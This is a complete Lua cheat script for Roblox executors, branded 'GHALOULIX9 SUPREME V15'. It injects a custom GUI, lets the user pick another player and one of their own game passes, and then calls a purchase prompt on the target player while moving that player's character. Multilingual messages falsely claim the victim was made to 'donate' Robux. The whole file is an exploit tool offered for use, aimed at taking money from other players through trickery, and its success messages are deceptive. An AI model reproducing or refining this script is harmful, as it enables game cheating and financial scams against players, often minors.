-- [[ ðŸ‘‘ GHALOULIX9 SUPREME COMMANDER V15 ðŸ‘‘ ]] --
-- ðŸ› ï¸ 100% RAW LUA | ZERO RAYFIELD | ZERO LIBRARIES
-- âœ¨ STYLE: EXTREMELY BEAUTIFUL BLOOD-NEON | DELTA OPTIMIZED

repeat task.wait() until game:IsLoaded()

local CoreGui = game:GetService("CoreGui")
local TweenService = game:GetService("TweenService")
local MarketService = game:GetService("MarketplaceService")
local HttpService = game:GetService("HttpService")
local LP = game.Players.LocalPlayer
local LocService = game:GetService("LocalizationService")

-- Hard Cleanup
if CoreGui:FindFirstChild("SupremeV15_System") then CoreGui.SupremeV15_System:Destroy() end

-- [[ ðŸŒ TRANSLATION DICTIONARY ]] --
local Lang = LocService.RobloxLocaleId:lower()
local Dictionary = {
    ["en-us"] = {success = "THE DONATION SUCCESS!, THE PLAYER YOU MADE HIM DONATE YOU '%s' '%s R$' WAS SUCCESSFUL WORKED BECAUSE HE HAD '%s R$' SO NOW YOU WILL HAVE YOUR '%s R$' SOON ðŸ”œ", error = "ERROR THE PLAYER YOU ARE TRYING TO MAKE HIM DONATE YOU '%s', '%s R$' HE CAN'T DONATE BCS HE HAS '%s R$' AND HE CAN'T DONATE YOU THIS AMOUNT OF R$"},
    ["ar-gs"] = {success = "Ù†Ø¬Ø§Ø­ Ø§Ù„ØªØ¨Ø±Ø¹! Ø§Ù„Ù„Ø§Ø¹Ø¨ Ø§Ù„Ø°ÙŠ Ø¬Ø¹Ù„ØªÙ‡ ÙŠØªØ¨Ø±Ø¹ Ù„Ùƒ Ø¨Ù€ '%s' Ø¨Ù…Ø¨Ù„Øº '%s Ø±ÙˆØ¨ÙˆÙƒØ³' Ù†Ø¬Ø­ Ù„Ø£Ù†Ù‡ ÙƒØ§Ù† ÙŠÙ…ØªÙ„Ùƒ '%s Ø±ÙˆØ¨ÙˆÙƒØ³' Ù„Ø°Ø§ Ø³ØªØ­ØµÙ„ Ø¹Ù„Ù‰ '%s Ø±ÙˆØ¨ÙˆÙƒØ³' Ù‚Ø±ÙŠØ¨Ø§Ù‹ ðŸ”œ", error = "Ø®Ø·Ø£! Ø§Ù„Ù„Ø§Ø¹Ø¨ Ø§Ù„Ø°ÙŠ ØªØ­Ø§ÙˆÙ„ Ø¬Ø¹Ù„Ù‡ ÙŠØªØ¨Ø±Ø¹ Ù„Ùƒ Ø¨Ù€ '%s' Ø¨Ù…Ø¨Ù„Øº '%s Ø±ÙˆØ¨ÙˆÙƒØ³' Ù„Ø§ ÙŠÙ…ÙƒÙ†Ù‡ Ø§Ù„ØªØ¨Ø±Ø¹ Ù„Ø£Ù†Ù‡ ÙŠÙ…ØªÙ„Ùƒ ÙÙ‚Ø· '%s Ø±ÙˆØ¨ÙˆÙƒØ³'"},
    ["fr-fr"] = {success = "DONATION RÃ‰USSIE ! LE JOUEUR QUE VOUS AVEZ FAIT DONNER '%s' '%s R$' A RÃ‰USSI CAR IL AVAIT '%s R$' DONC VOUS AUREZ VOS '%s R$' BIENTÃ”T ðŸ”œ", error = "ERREUR LE JOUEUR QUE VOUS ESSAYEZ DE FAIRE DONNER '%s', '%s R$' NE PEUT PAS CAR IL A '%s R$'"},
    ["es-es"] = {success = "Â¡DONACIÃ“N EXITOSA! EL JUGADOR QUE HICISTE DONAR '%s' '%s R$' FUNCIONÃ“ PORQUE TENÃA '%s R$' ASÃ QUE TENDRÃS TU '%s R$' PRONTO ðŸ”œ", error = "ERROR EL JUGADOR QUE INTENTAS HACER DONAR '%s', '%s R$' NO PUEDE PORQUE TIENE '%s R$'"}
}
local function GetMsg(key, v1, v2, v3)
    local set = Dictionary[Lang] or Dictionary["en-us"]
    return string.format(set[key], tostring(v1), tostring(v2), tostring(v3))
end

-- [[ ðŸŽ¨ PURE CUSTOM "SUPREME" UI ]] --
local UI = Instance.new("ScreenGui", CoreGui); UI.Name = "SupremeV15_System"
local Base = Instance.new("Frame", UI); Base.Size = UDim2.new(0, 600, 0, 450); Base.Position = UDim2.new(0.5, -300, 0.5, -225); Base.BackgroundColor3 = Color3.fromRGB(10, 10, 10); Base.BorderSizePixel = 0
local Rounding = Instance.new("UICorner", Base); Rounding.CornerRadius = UDim.new(0, 15)

-- Pulsing Neon Stroke
local Line = Instance.new("UIStroke", Base); Line.Thickness = 4; Line.Color = Color3.fromRGB(255, 0, 0)
task.spawn(function()
    while true do
        TweenService:Create(Line, TweenInfo.new(1.2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Color = Color3.fromRGB(80, 0, 0)}):Play()
        task.wait(1.2)
        TweenService:Create(Line, TweenInfo.new(1.2, Enum.EasingStyle.Sine, Enum.EasingDirection.InOut), {Color = Color3.fromRGB(255, 0, 0)}):Play()
        task.wait(1.2)
    end
end)

-- Header Text (Custom Font Style)
local Head = Instance.new("TextLabel", Base); Head.Size = UDim2.new(1, 0, 0, 60); Head.Text = "GHALOULIX9 SUPREME V15"; Head.TextColor3 = Color3.new(1,1,1); Head.Font = "GothamBlack"; Head.TextSize = 26; Head.BackgroundTransparency = 1

-- Live Console
local Display = Instance.new("TextLabel", Base); Display.Size = UDim2.new(0.94, 0, 0, 90); Display.Position = UDim2.new(0.03, 0, 0.15, 0); Display.BackgroundColor3 = Color3.fromRGB(5,5,5); Display.TextColor3 = Color3.fromRGB(255, 255, 255); Display.Font = "Code"; Display.TextSize = 14; Display.TextWrapped = true; Display.Text = ">> SYSTEM ONLINE | RAW CODE STATUS: SECURE"; Instance.new("UICorner", Display)

-- Selection Views
local function BuildView(pos, name)
    local f = Instance.new("ScrollingFrame", Base); f.Size = UDim2.new(0.45, 0, 0.45, 0); f.Position = pos; f.BackgroundTransparency = 1; f.ScrollBarThickness = 2; f.AutomaticCanvasSize = "Y"
    Instance.new("UIListLayout", f).Padding = UDim.new(0, 8)
    local l = Instance.new("TextLabel", Base); l.Size = UDim2.new(0.45, 0, 0, 20); l.Position = UDim2.new(pos.X.Scale, pos.X.Offset, pos.Y.Scale, -25); l.Text = name; l.TextColor3 = Color3.fromRGB(255, 50, 50); l.Font = "GothamBold"; l.TextSize = 14; l.BackgroundTransparency = 1
    return f
end

local PView = BuildView(UDim2.new(0.03, 0, 0.4, 0), "PLAYER SELECTION")
local GView = BuildView(UDim2.new(0.52, 0, 0.4, 0), "DONATION PRICE")

-- The Main Action Trigger
local Trigger = Instance.new("TextButton", Base); Trigger.Size = UDim2.new(0.94, 0, 0, 65); Trigger.Position = UDim2.new(0.03, 0, 0.83, 0); Trigger.BackgroundColor3 = Color3.fromRGB(180, 0, 0); Trigger.Text = "COMMAND DONATION ðŸ”œ"; Trigger.TextColor3 = Color3.new(1,1,1); Trigger.Font = "GothamBlack"; Trigger.TextSize = 22; Instance.new("UICorner", Trigger)

-- [[ âš™ï¸ SYSTEM LOGIC ]] --
local SelectedUser = nil
local SelectedID = {id = nil, cost = 0}

local function CheckWealth(p)
    local s = p:FindFirstChild("leaderstats")
    return (s and s:FindFirstChild("Donated") and s.Donated.Value or 0) + (s and s:FindFirstChild("Raised") and s.Raised.Value or 0)
end

local function Load()
    -- Load Targets
    for _, p in pairs(game.Players:GetPlayers()) do
        if p ~= LP then
            local b = Instance.new("TextButton", PView); b.Size = UDim2.new(1, -10, 0, 40); b.BackgroundColor3 = Color3.fromRGB(20, 20, 20); b.Text = p.DisplayName .. " [$" .. CheckWealth(p) .. "]"; b.TextColor3 = Color3.new(1,1,1); b.Font = "GothamBold"; Instance.new("UICorner", b)
            b.MouseButton1Click:Connect(function() SelectedUser = p; Display.Text = ">> TARGET LOCKED: " .. p.Name end)
        end
    end
    -- Load Your Store
    pcall(function()
        local games = HttpService:JSONDecode(game:HttpGet("https://games.roproxy.com/v2/users/"..LP.UserId.."/games?accessFilter=Public&limit=5")).data
        for _, g in pairs(games) do
            local ps = HttpService:JSONDecode(game:HttpGet("https://games.roproxy.com/v1/games/"..g.id.."/game-passes")).data
            for _, pass in pairs(ps) do
                local b = Instance.new("TextButton", GView); b.Size = UDim2.new(1, -10, 0, 40); b.BackgroundColor3 = Color3.fromRGB(0, 60, 0); b.Text = pass.price .. " R$"; b.TextColor3 = Color3.new(1,1,1); b.Font = "GothamBlack"; Instance.new("UICorner", b)
                b.MouseButton1Click:Connect(function() SelectedID = {id = pass.id, cost = pass.price} end)
            end
        end
    end)
end

Trigger.MouseButton1Click:Connect(function()
    if not SelectedUser or not SelectedID.id then return end
    local currentR = CheckWealth(SelectedUser)
    
    if currentR >= SelectedID.cost then
        Display.TextColor3 = Color3.new(0, 1, 0)
        Display.Text = ">> " .. GetMsg("success", SelectedUser.Name, SelectedID.cost, currentR)
        local root = SelectedUser.Character and SelectedUser.Character:FindFirstChild("HumanoidRootPart")
        if root then
            local old = root.CFrame
            root.CFrame = LP.Character.HumanoidRootPart.CFrame * CFrame.new(0, 0, -5)
            MarketService:PromptGamePassPurchase(SelectedUser, SelectedID.id)
            task.wait(5)
            root.CFrame = old
        end
    else
        Display.TextColor3 = Color3.new(1, 0, 0)
        Display.Text = ">> " .. GetMsg("error", SelectedUser.Name, SelectedID.cost, currentR)
    end
end)

-- Draggable Logic (Custom)
local UIS = game:GetService("UserInputService")
local drag, dInput, dStart, sPos
Base.InputBegan:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then drag = true dStart = i.Position sPos = Base.Position end end)
Base.InputEnded:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseButton1 then drag = false end end)
UIS.InputChanged:Connect(function(i) if i.UserInputType == Enum.UserInputType.MouseMovement and drag then local delta = i.Position - dStart Base.Position = UDim2.new(sPos.X.Scale, sPos.X.Offset + delta.X, sPos.Y.Scale, sPos.Y.Offset + delta.Y) end end)

Load()
